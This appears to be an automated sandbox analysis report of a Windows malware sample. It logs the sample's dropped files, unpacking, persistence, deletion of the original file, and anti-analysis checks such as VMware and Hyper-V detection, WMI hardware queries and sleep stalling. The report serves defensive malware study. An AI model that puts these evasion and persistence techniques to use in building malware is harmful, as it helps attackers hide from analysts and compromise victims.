      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: rstrtmgr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: vcomp140.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{99B29D3B-368A-4BE6-B675-805A69114497}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: N:\Programming\Visual Studio repos\MainBeast++\MainBeast++\Release\MainBeast++.pdb+ source: Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp
      Source: Binary string: N:\Programming\Visual Studio repos\MainBeast++\MainBeast++\Release\MainBeast++.pdb source: Later.pif, Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.mazi:R;.sicas:R;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\wjshsfaUnpacked PE file: 4.2.wjshsfa.400000.0.unpack .text:ER;.rdata:R;.data:W;.mazi:R;.sicas:R;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeCode function: 7_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,7_2_004062FC
      Source: file.exeStatic PE information: section name: .mazi
      Source: file.exeStatic PE information: section name: .sicas
      Source: wjshsfa.2.drStatic PE information: section name: .mazi
      Source: wjshsfa.2.drStatic PE information: section name: .sicas
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401CD1 push ecx; ret 0_2_00401CD2
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401C91 push 00000076h; iretd 0_2_00401C93
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E96 push B92A2F4Ch; retf 0_2_00402E9B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021D1D38 push ecx; ret 0_2_021D1D39
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021D2EFD push B92A2F4Ch; retf 0_2_021D2F02
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021D1CF8 push 00000076h; iretd 0_2_021D1CFA
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_022A9B6C push FFFFFFFBh; iretd 0_2_022A9B82
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_022A7AEE push edx; ret 0_2_022A7AEF
      Source: C:\Users\user\AppData\Roaming\wjshsfaCode function: 4_2_02159C9C push FFFFFFFBh; iretd 4_2_02159CB2
      Source: C:\Users\user\AppData\Roaming\wjshsfaCode function: 4_2_02157C1E push edx; ret 4_2_02157C1F
      Source: C:\Users\user\AppData\Roaming\wjshsfaCode function: 4_2_02241D38 push ecx; ret 4_2_02241D39
      Source: C:\Users\user\AppData\Roaming\wjshsfaCode function: 4_2_02242EFD push B92A2F4Ch; retf 4_2_02242F02
      Source: C:\Users\user\AppData\Roaming\wjshsfaCode function: 4_2_02241CF8 push 00000076h; iretd 4_2_02241CFA
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C18AA5 push ecx; ret 19_2_00C18AB8
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C00A5D push 739D00C3h; ret 19_2_00C00A66
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00BF8D64 push ss; ret 19_2_00BF8D66
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00BF7DFF push es; ret 19_2_00BF7E05
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00BF7DFC push es; ret 19_2_00BF7DFD
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00BF7DF2 push es; ret 19_2_00BF7DF9
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00BF7E1E push es; ret 19_2_00BF7E21
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00BF7E1A push es; ret 19_2_00BF7E1D
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00BF7E16 push es; ret 19_2_00BF7E19
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00BF7E0F push es; ret 19_2_00BF7E11
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00BF7E08 push es; ret 19_2_00BF7E09
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0142C408 push esp; ret 19_2_0142C409
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0148B1AE push cs; iretd 19_2_0148B1AF
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014D9405 push ecx; ret 19_2_014D9418
      Source: file.exeStatic PE information: section name: .text entropy: 6.979655173728229
      Source: wjshsfa.2.drStatic PE information: section name: .text entropy: 6.979655173728229

      Persistence and Installation Behavior

      barindex
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\78801\Later.pifJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\78801\Later.pifJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wjshsfaJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9CFE.exeJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wjshsfaJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\wjshsfa:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C7577B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,19_2_00C7577B
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C05EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,19_2_00C05EDA
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C132E9 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_00C132E9
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wjshsfaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wjshsfaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wjshsfaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wjshsfaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wjshsfaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\wjshsfaKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeStalling execution: Execution stalls by calling Sleepgraph_7-3897
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_VideoController
      Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 7FF8C88EE814
      Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 7FF8C88ED584
      Source: C:\Users\user\AppData\Roaming\wjshsfaAPI/Special instruction interceptor: Address: 7FF8C88EE814
      Source: C:\Users\user\AppData\Roaming\wjshsfaAPI/Special instruction interceptor: Address: 7FF8C88ED584
      Source: file.exe, 00000000.00000002.2183164619.00000000022B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
      Source: wjshsfa, 00000004.00000002.2417069266.0000000002160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK<Q5H
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifThread delayed: delay time: 1200000Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 463Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4694Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 861Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 355Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 895Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 856Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_19-175012
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifAPI coverage: 4.9 %
      Source: C:\Windows\explorer.exe TID: 4456Thread sleep count: 463 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6164Thread sleep count: 4694 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6164Thread sleep time: -469400s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 3408Thread sleep count: 861 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3408Thread sleep time: -86100s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 5460Thread sleep count: 301 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5524Thread sleep count: 355 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5524Thread sleep time: -35500s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 5468Thread sleep count: 333 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5468Thread sleep time: -33300s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\timeout.exe TID: 6256Thread sleep count: 36 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif TID: 6620Thread sleep time: -19200000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_Processor
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeCode function: 7_2_004062D5 FindFirstFileW,FindClose,7_2_004062D5
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeCode function: 7_2_00402E18 FindFirstFileW,7_2_00402E18
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeCode function: 7_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00406C9B
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C5C16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_00C5C16C
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C547B7 GetFileAttributesW,FindFirstFileW,FindClose,19_2_00C547B7
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C5CB81 FindFirstFileW,FindClose,19_2_00C5CB81
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C5CC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,19_2_00C5CC0C
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C5F445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00C5F445
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C5F5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00C5F5A2
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C53B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00C53B4F
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C53E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00C53E72
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_01410730 FindFirstFileW,FindClose,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,19_2_01410730
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_01410810 FindNextFileW,FindClose,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,19_2_01410810
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014FB7D0 _vcomp_for_static_simple_init,GetFileAttributesA,_vcomp_for_static_end,_vcomp_for_static_simple_init,GetFileAttributesA,FindFirstFileW,CreateFileA,GetFileSize,ReadFile,CloseHandle,FindNextFileW,FindClose,_vcomp_for_static_end,19_2_014FB7D0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014F2001 FindFirstFileExW,19_2_014F2001
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C05D13 GetVersionExW,GetCurrentProcess,IsWow64Process,FreeLibrary,GetSystemInfo,GetSystemInfo,19_2_00C05D13
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifThread delayed: delay time: 1200000Jump to behavior
      Source: explorer.exe, 00000002.00000000.2165593335.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
      Source: explorer.exe, 00000002.00000000.2165593335.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
      Source: Later.pif, 00000013.00000003.4146934684.00000000016BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLZZDUJIUHYZLUNSOMJMWEUBWYSZMXVDNUGSZBSFDACOIFWETJRIXVPDMSVMTKEKNHJFFXCTPPDKYDXOUOGJAFSXVENTIMFLXNKBWSOIJAZLZTXZGBBMUATMNGOCOLHIAOOTBENXJLNEBPUYZAWEWHZCOBEUXLNOCBFMFNLCFQRYSEURUEVQSEGVPCVNXYOUEBPWYJVBOVZHHSIVQELASLMFLMIGPFTSWZUYAGUCKFCQXXUWMMESTICTHONLUYSPUWOTQKWRRQMUHGZGAAEZOPOKQULFWRPEFDYEONLKPEMDUKCRINZIRUSKDDNYBNBYIIEFYAXNFVFGHEJTHFTUPICAWBETIIANYRONFSQFBHEGJISEQSPFKPRSEZHTQOXRPUKTEUQJYBYNQULHXLSRXNENUVTORORBUHFHDFSRJFILKEVULBILAWPLSQLSOWMKABQ
      Source: tmp1721021440_3.19.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
      Source: tmp1721021440_3.19.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
      Source: explorer.exe, 00000002.00000000.2159497737.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
      Source: tmp1721021440_3.19.drBinary or memory string: global block list test formVMware20,11696428655
